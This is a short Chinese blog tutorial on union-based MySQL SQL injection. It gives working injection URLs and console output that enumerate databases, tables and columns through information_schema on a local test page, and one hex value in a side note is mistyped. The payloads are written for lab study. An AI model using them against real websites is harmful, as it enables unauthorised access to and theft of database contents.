zoukankan      html  css  js  c++  java

  • sql注入学习小结

    /*

    转载请注明出处,By:珍惜少年时

    小知识,只是放在博客吃饭时无聊看看,大牛勿喷。

    */

    珍惜少年时博客,专注网络安全 web渗透测试

    00x1爆所有库:

    mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| dvwa               |
| mysql              |
| performance_schema |
| phpcmsv9           |
| security           |
| sqlinject          |
| test               |
| test_sqlinjection  |
+--------------------+
10 rows in set (0.00 sec)

    #该命令等价于show databases;
    #所以sql语句为:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(schema_name) from information_schema.schemata--

    00x2爆所有表:

    mysql> select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
+--------------------------+
| group_concat(table_name) |
+--------------------------+
| admin,user,user_a        |
+--------------------------+
1 row in set (0.00 sec)

    #注:
    0x91916c696E6a656374为sqlinject库的16进制 
    #该命令等价于show tables;当然了,是在选择了数据库的情况下,也就是where哪里使用hex选择了的。
    #所以sql语句为:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374--

    #可将其缩句为:select table_name from information_schema.tables

    该sql语句可不选择数据库,直接爆所有的表。“列名”亦是如此。

    00x3爆所有列:

    mysql> select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
+----------------------------------------------------------------+
| group_concat(column_name)                                      |
+----------------------------------------------------------------+
| id,username,password,id,username,password,id,username,password |
+----------------------------------------------------------------+
1 row in set (0.03 sec)

    故语句为:
    http://127.0.0.1/sqlinjection.php?id=-5 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374--
  • 相关阅读:
    解决html2canvas插件object-fit样式不生效问题
    七牛云视频获取视频封面和缩略图
    实现一个简单拖拽
    elementui遮罩层下方内容禁止滑动
    echars适配代码
    修改vue项目页面的title
    用div实现textarea
    判断手机端和pc端
    angular的跨域
    angular的文件上传
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6059998.html
Copyright © 2011-2022 走看看